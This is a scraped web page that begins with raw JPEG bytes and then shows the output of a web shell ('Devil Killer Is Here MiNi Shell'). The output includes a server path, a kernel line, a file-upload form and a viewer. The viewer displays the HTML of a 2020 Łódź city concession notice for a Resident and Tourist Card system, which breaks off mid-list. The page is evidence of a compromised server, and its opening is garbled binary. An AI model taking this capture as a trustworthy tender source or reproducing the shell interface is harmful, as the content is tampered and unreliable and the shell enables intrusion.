JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200609/1100000225-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 1100000024-N-2020 z dnia 2020-06-09 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Miasto Łódź, Wydział Zamówień Publicznych w Departamencie Obsługi i Administracji Urzędu Miasta Łodzi</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_przedmiotu_koncesji_h">Wybór partnera prywatnego do realizacji przedsięwzięcia polegającego na uruchomieniu i obsłudze systemu Karty Mieszkańca i Karty Turysty dla Miasta Łodzi.</span><br/> OGŁOSZENIE O KONCESJI - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczenie ogłoszenia jest obowiązkowe</b> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Miasto Łódź, Wydział Zamówień Publicznych w Departamencie Obsługi i Administracji Urzędu Miasta Łodzi</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00051418200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ks. I. J. Skorupki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">21</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">90-532</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Łódź</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">42 638 48 88, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">m.jermolinska@uml.lodz.pl, w.seliga@uml.lodz.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">42 638 48 77</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url"></span> <br/> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) KOMUNIKACJA: </b> <div style="padding-left: 20px"> Dostęp do dokumentów koncesji można uzyskać pod adresem (URL) (w postępowaniach podzielonych na etapy informację tą można podać w zaproszeniu do składania ofert ) <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_pod_adresem_url">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_pod_adresem_url">https://bip.uml.lodz.pl/urzad-miasta/przetargi/partnerstwo-publiczno-prywatne/</span> <br /> Część dokumentów koncesji zostanie udostępniona w inny sposób niż za pomocą środków komunikacji elektronicznej z uwagi na szczególne względy techniczne lub związane z bezpieczeństwem (w postępowaniach podzielonych na etapy informację tę można podać w zaproszeniu do składania ofert ): <span id="ctl00_ContentPlaceHolder1_czy_czesc_dokumentow_zostanie_udostepniona">Nie</span> <br /> <span id="ctl00_ContentPlaceHolder1_czesc_dokumentow_zostanie_udostepniona"></span> </div> <div style="padding-left: 20px"> <b>Oferty/wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br /> <b>Na adres:</b><span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_przeslac_adres">Tak</span> <br /> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_przeslac_adres">Urząd Miasta Łodzi Wydział Zamówień Publicznych w Departamencie Obsługi i Administarcji ul. ks. Ignacego Skorupki 21 90-532 Łódź </span> <br /> <b>Elektronicznie na adres:</b><span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_przeslac_elektronicznie">Nie</span> <br /> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_przeslac_elektronicznie"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT UMOWY KONCESJI </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1 Nazwa: </b> <br /> <span id="ctl00_ContentPlaceHolder1_nazwa_przedmiotu_koncesji">Wybór partnera prywatnego do realizacji przedsięwzięcia polegającego na uruchomieniu i obsłudze systemu Karty Mieszkańca i Karty Turysty dla Miasta Łodzi.</span> <br/> <b>Numer referencyjny: </b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">DAR-BPM-I.271.35.2020</span> <br/> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>Umowa koncesji będzie finansowana ze środków pochodzących z projektu/programu Unii Europejskiej: </b><span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> <br /> Nazwa i numer projektu/programu: <br /> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.2 Rodzaj umowy koncesji:</b> <br />Roboty budowlane: <span id="ctl00_ContentPlaceHolder1_rodzaj_umowy_koncesji_rb"></span> <br />Usługi: <span id="ctl00_ContentPlaceHolder1_rodzaj_umowy_koncesji_uslugi">Tak</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.3 Informacja o częściach:</b> <br /> <b>Przedmiot umowy koncesji podzielony jest na części:</b><span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br /> <b>Oferty można składać w odniesieniu do:</b> <br /> <span id="ctl00_ContentPlaceHolder1_oferty_w_odniesieniu_do"></span> <br /> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br /> <b>Maksymalna liczba części przedmiotu umowy koncesji, w których umowa może być zawarta z tym samym wykonawcą</b><span id="ctl00_ContentPlaceHolder1_czy_maksymalna_liczba_czesci_moze_byc_zawarta">Nie</span> <br /> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_moze_byc_zawarta">0</span> <br /> <b>Zamawiający zastrzega sobie prawo do zawarcia umowy koncesji łącznie w odniesieniu do następujących części lub grup części </b><span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_zastrzega_prawo_do_zawarcia_umowy">Nie</span> <br /> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_zastrzega_prawo_do_zawarcia_umowy"></span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.4 Krótki opis przedmiotu umowy koncesji:</b><i>(wielkość lub zakres usług lub robót budowlanych, a w przypadku, gdy przedmiot umowy koncesji nie jest dzielony na części także rodzaj i ilość robót budowlanych lub usług lub określenie zapotrzebowania i wymagań, o których mowa w art. 26 ust. 1 i 2 ustawy o umowie koncesji): </i> <br /> <span id="ctl00_ContentPlaceHolder1_krotki_opis_umowy_koncesji">Niniejsze zamówienie dotyczy realizacji Przedsięwzięcia w formule partnerstwa publiczno-prywatnego w rozumieniu Ustawy z dnia 08 kwietnia 2020 r. o partnerstwie publiczno-prywatnym oraz z zachowaniem przepisów ustawy o umowie koncesji na roboty budowlane lub usługi. Przedmiotem postępowania będzie zawarcie umowy o partnerstwie publiczno-prywatnym w celu wspólnej realizacji przedsięwzięcia polegającego na uruchomieniu i obsłudze systemu Karty Mieszkańca i Karty Turysty. W ramach Przedsięwzięcia Partner Prywatny będzie zobowiązany do sfinansowania, wdrożenia i uruchomienia systemu do obsługi Karty Mieszkańca i Karty Turysty w Mieście Łodzi, a następnie jego kompleksowego utrzymania, konserwacji i rozwoju przez okres określony w Umowie o ppp. Po stronie Partnera Prywatnego będzie także przygotowanie niezbędnej infrastruktury oraz zasobów do sprawnego wydawania i aktywowania Kart Mieszkańca i Kart Turysty, a także pozyskiwanie partnerów handlowych.Wdrożenie usługi Karty Mieszkańca i Karty Turysty będzie umożliwiało mieszkańcom i turystom odwiedzającym Łódź korzystanie w ramach określonego programu z usług (np. kulturalnych, sportowych, komunikacyjnych, rekreacyjnych, turystycznych, handlowych u Partnerów) i atrakcji oferowanych przez Miasto Łódź i inne podmioty w postaci rabatów, ulg czy premii. System ma wspierać również podmioty miejskie w stworzeniu wspólnego kanału sprzedaży wybranych usług w połączeniu z komunikacją publiczną na warunkach szczególnych określonych programem. W dalszym etapie rozwoju, system będzie współpracował z podmiotami handlowymi w celu pobudzenia lokalnej przedsiębiorczości, idei konsumenckiego patriotyzmu lokalnego oraz pobudzania szeroko rozumianych inicjatyw społecznych integrujących społeczeństwo Łodzi. System również zakłada przyszłą współpracę i możliwą integrację z różnymi systemami i programami społecznymi. Zarówno z tymi, które są planowane do wdrożenia jak i już działającymi na przykład: Łódzka Karta Dużej Rodziny, Łódzka Migawka, Łódź Karta Biblioteczna - Fiszka, Łódzka Karta Seniora, Łódzka Karta Młodzi w Łodzi. Opis zamówienia (przedmiotu Umowy o ppp) – informacje szczegółowePrzedmiot Przedsięwzięcia obejmie wspólną realizację polegającą na uruchomieniu i obsłudze systemu Karty Mieszkańca i Karty Turysty dla Miasta Łodzi w szczególności: 1. Poniesienie przez Partnera Prywatnego wydatków na realizację Przedsięwzięcia w zakresie określonym w umowie o ppp (sfinansowanie Przedsięwzięcia);2. Uruchomienie systemu w postaci aplikacji mobilnej i jego bieżące kompleksowe i sprawne utrzymanie, asystę techniczną, rozwój oraz bieżącą konserwację z uwzględnieniem szczególnych potrzeb Zamawiającego. Jak również modernizację przez okres trwania umowy wynikającą ze zmian technologicznych związanych z obsługą mieszkańców i turystów, z uwzględnieniem możliwości znacznego przyrostu liczby użytkowników systemu;3. System powinien umożliwiać obsługę dla mieszkańców i turystów zarówno za pośrednictwem fizycznego nośnika w postaci karty jak również aplikacji mobilnej:-	System powinien wspierać wersje przeglądarek internetowych (m.in. Google Chrome, FireFox, Edge, Chromium, Safari) i Aplikację mobilną.-	System powinien obsługiwać Panele (Panel administracyjny, Panel użytkownika, Panel partnera handlowego), Aplikację mobilną zainstalowaną na smartfonach (z systemem Android w wersji powyżej 4.3 oraz iOS w wersji co najmniej 10) i stronę internetową (portal informacyjny oraz Panel użytkownika, administratora i partnera handlowego).-	Aplikacja mobilna musi być dostępna w ramach Sklepu Google dla systemu oraz App Store dla systemu iOS. Partner Prywatny jest zobligowany do ciągłej aktualizacji aplikacji mobilnej. -	System powinien zapewniać mieszkańcom możliwość zarządzania swoimi kontami i kontami powiązanymi, edycję danych, sprawdzania posiadanych Pakietów, historię aktywności, komunikację z Operatorem, historię udzielonych zgód, a także zapewniać możliwość ich wycofania.-	System powinien posiadać bazę relacyjną, System powinien zapewniać bieżącą walidację w trakcie trwania umowy, zapewnić eksport danych raz do roku oraz po zakończeniu współpracy wraz z opisem środowiska, w którym można odczytać dane z kopii zapasowych, opisy struktury danych bazy – umożliwiającą migrację do innego silnika bazy danych.-	system musi spełniać wymagania ustawy z dnia 18.07.2002 r. o świadczeniu usług drogą elektroniczną.-	Płatność za karty przez znane metody płatności online (np. Dotpay, PayPal, BLIK, PayU).-	System musi być zgodny z ustawą z dnia 4 kwietnia 2019 r. o dostępności cyfrowej stron internetowych i aplikacji mobilnych podmiotów publicznych.-	System musi zapewniać bezpieczeństwo zgodnie z rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE oraz z innymi przepisami prawa powszechnie obowiązującego, które chronią prawa osób, których dane dotyczą.-	System musi zapewniać realizację praw osób, których dane są przetwarzane, zgodnie z rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE oraz z innymi przepisami prawa powszechnie obowiązującego, które chronią prawa osób, których dane dotyczą.Z wybranym partnerem prywatnym zostanie zawarta umowa powierzenia przetwarzania danych.4. Zabezpieczenie możliwości wydawania i aktywowania Karty Mieszkańca i Karty Turysty na terenie miasta Łodzi, z zachowaniem konieczności wydzierżawienia przestrzeni do realizacji tego celu oraz zapewnienia pełnej obsługi i wyposażenia niezbędnego do świadczenia usługi we wszystkich uzgodnionych z Podmiotem Publicznym lokalizacjach.Zamawiający uzgodni określoną liczbę miejsc i ich lokalizację na terenie miasta Łodzi na etapie negocjacji.5. Zarówno Karta Mieszkańca, jak i Karta Turysty będzie umożliwiała użytkownikom skorzystanie z usług i atrakcji oferowanych przez Miasto Łódź i inne podmioty w postaci rabatów, ulg, premii (np. na wydarzenia: kulturalne, sportowe, komunikacyjne, rekreacyjne) u partnerów handlowych. Pozyskiwanie potencjalnych partnerów handlowych oraz wszelkie formalności z tym związane pozostają po stronie Partnera Prywatnego.Zarówno minimalne wymagania, w szczególności funkcjonalne i prawne, którym ma odpowiadać oferta, jak i ostateczny zakres realizacji Przedsięwzięcia zostanie określony w Zaproszeniu do składania ofert na podstawie ustaleń poczynionych w trakcie negocjacji oraz na podstawie poznanych przez Podmiot Publiczny rozwiązań proponowanych przez Partnerów Prywatnych w zakresie realizacji Przedsięwzięcia. 6. System również zakłada przyszłą współpracę i możliwą integrację z różnymi systemami i programami społecznymi Podmiotu Publicznego. Warunki współpracy i jej zasady będą podlegały każdorazowo odrębnemu uzgodnieniu. 7. Partner Publiczny przewiduje wkład własny w Przedsięwzięcie w postaci jednorazowego zakupu fizycznych nośników - kart, przeznaczonych do kolportażu. Wolumen zostanie dookreślony na etapie negocjacji, z zachowaniem wyłącznego pożytku z tego tytułu po stronie Partnera Prywatnego.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.5 Główny kod CPV:</b><span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">98350000-1</span> <br/> <b>Dodatkowe kody CPV:</b><i>(jeżeli dotyczy)</i> <br /> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.6 Szacunkowa wartość umowy koncesji:</b><i>(jeżeli dotyczy)</i>: <br/> <b>Wartość bez VAT:&#160;</b> <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_umowy"></span> &#160;&#160;<b>Waluta:</b>&#160; <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_umowy_waluta">zl</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.7 Okres obowiązywania umowy koncesji</b>: <br/> <b>Okres w miesiącach:</b><span id="ctl00_ContentPlaceHolder1_okres_miesiacach">120</span><b> lub dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_dniach"></span> <br /> lub <br /> <b>data rozpoczęcia:</b><span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span><b> lub zakończenia:</b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.8 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br/> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe"></span> <br /> </div> </div> <br /> <br /> <div class="headerLarge_xforms" style="text-align: center"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE EKONOMICZNYM, FINANSOWYM, TECHNICZNYM I ZAWODOWYM ORAZ PODSTAWY WYKLUCZENIA Z POSTĘPOWANIA O ZAWARCIE UMOWY KONCESJI </u> </div> <br /> <b>III.1. KRYTERIA KWALIFIKACJI DO UDZIAŁU W POSTĘPOWANIU</b> <br /> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.1.1 Kryteria dotyczące sytuacji finansowej lub ekonomicznej</b><i>(jeżeli dotyczy)</i>: <br/> Wykaz kryteriów kwalifikacji wraz z krótkim opisem oraz ze wskazaniem minimalnego poziomu spełniania kryterium, jeżeli jest wymagany: <br /> <span id="ctl00_ContentPlaceHolder1_kryteria_III_1_1">zdolność finansowa - Podmiot Prywatny na potwierdzenie spełnienia warunku sytuacji finansowej winien wykazać, że dysponuje środkami finansowymi lub posiada zdolność kredytową na kwotę minimum 500 tysięcy PLN; Do przeliczenia wartości finansowej określonej powyżej, a występującej w innej walucie niż PLN, Podmiot Publiczny zastosuje średni kurs Narodowego Banku Polskiego, z dnia publikacji Ogłoszenia albo średni kurs NBP z pierwszego dnia roboczego poprzedzającego dzień opublikowania ogłoszenia, jeżeli dniem opublikowania ogłoszenia jest sobota.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.1.2 Kryteria dotyczące zdolności technicznej lub zawodowej</b><i>(jeżeli dotyczy)</i>: <br/> Wykaz kryteriów wraz z krótkim opisem oraz ze wskazaniem minimalnego poziomu spełniania kryterium, jeżeli jest wymagany: <br /> <span id="ctl00_ContentPlaceHolder1_kryteria_III_1_2">zdolność techniczna - w ciągu 5 lat wykonał co najmniej 2 wdrożenia analogicznego systemu dla miast o liczbie ludności nie mniejszej niż 40 tys. mieszkańców każde; Na potrzeby oceny kryterium kwalifikacji w zakresie zdolności technicznej przyjmuje się następującą definicję: przez analogiczny system, rozumie się: uruchomienie i wdrożenie karty upoważniającej do skorzystania z usług i atrakcji oferowanych przez Miasto i inne podmioty w postaci rabatów, ulg, premii (np. na wydarzenia: kulturalne, sportowe, komunikacyjne, rekreacyjne) u partnerów handlowych.</span> <br /> Umowa koncesji jest zastrzeżona dla zakładów pracy chronionej oraz wykonawców, których głównym celem jest społeczna i zawodowa integracja osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych albo w rozumieniu właściwych przepisów państw członkowskich Europejskiego Obszaru Gospodarczego lub osób defaworyzowanych: &#160;&#160; <span id="ctl00_ContentPlaceHolder1_czy_umowa_koncesji_zastrzezona">Nie</span> <br /> Minimalny wskaźnik zatrudnienia osób niepełnosprawnych lub defaworyzowanych wynosi:<span id="ctl00_ContentPlaceHolder1_III_1_2_Procent"></span>% osób zatrudnionych przez zakłady pracy chronionej lub wykonawców, których głównym celem jest społeczna i zawodowa integracja osób niepełnosprawnych </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.1.3 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_III_1_3">W celu spełnienia kryteriów kwalifikacji Wykonawca może polegać na zdolnościach innych podmiotów, bez względu na charakter prawny związków łączących go z tymi podmiotami. W przypadku gdy Wykonawca chce korzystać ze zdolności innych podmiotów, jest obowiązany udowodnić Zamawiającemu, że będzie dysponował niezbędnymi zasobami w ciągu całego okresu wykonywania Umowy o ppp, w szczególności przedstawiając w tym celu stosowne zobowiązanie takich podmiotów (uwaga: w przypadku gdy Wykonawca będzie korzystał ze zdolności innych podmiotów, Wykonawca załącza stosowne zobowiązanie podmiotu do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu Umowy o ppp, którego wzór znajduje się w Opisie Postępowania – Załącznik nr 8 do Opisu Postępowania). Wykonawca, który polega na zdolności innych podmiotów w odniesieniu do kryteriów dotyczących sytuacji finansowej, odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Wykonawcy wspólnie ubiegający się o zawarcie Umowy o ppp ustanawiają pełnomocnika do reprezentowania ich w Postępowaniu albo do reprezentowania w postępowaniu i zawarcia Umowy o ppp. Pełnomocnictwo należy dołączyć do Wniosku. Pełnomocnictwo musi być złożone w oryginale albo w formie poświadczonej notarialnie.W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo – jeżeli dotyczy - musi zostać załączone do oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza. W przypadku pełnomocnictwa złożonego w innym języku niż język polski winno być ono złożone wraz z przysięgłym tłumaczeniem na język polski.Każdy z Wykonawców wspólnie ubiegających się o zawarcie Umowy o ppp w ramach konsorcjum lub wspólników spółki cywilnej musi złożyć dokumenty w celu wykazania braku podstaw wykluczenia z Postępowania,. wymienione w rozdziale 5, pkt. 5.3, ust. 5.3.2.2. Opisu Postępowania – jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej). Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.</span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> III.2 PODSTAWY WYKLUCZENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>Zamawiający przewiduje wykluczanie wykonawców z postępowania o zawarcie umowy koncesji w oparciu o podstawy wykluczenia określone w art. 32 ust. 1 ustawy o umowie koncesji</b><span id="ctl00_ContentPlaceHolder1_czy_podstawy_wykluczenia_III_2_1">Tak</span> <br />Podstawy, w oparciu o które wykonawcy będą wykluczani z postępowania <i>(należy wypełnić w przypadku, gdy zamawiający przewiduje wykluczanie wykonawców w oparciu o podstawy wykluczenia określone w art. 32 ust. 1 ustawy o umowie koncesji)</i>: <br /><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 1 lit a ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_1a">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 1 lit. b ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_1b">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 1 lit. c ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_1c">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 1 lit. d ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_1d">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 2 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_2">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 3 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_3">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 4 ustawy o umowie 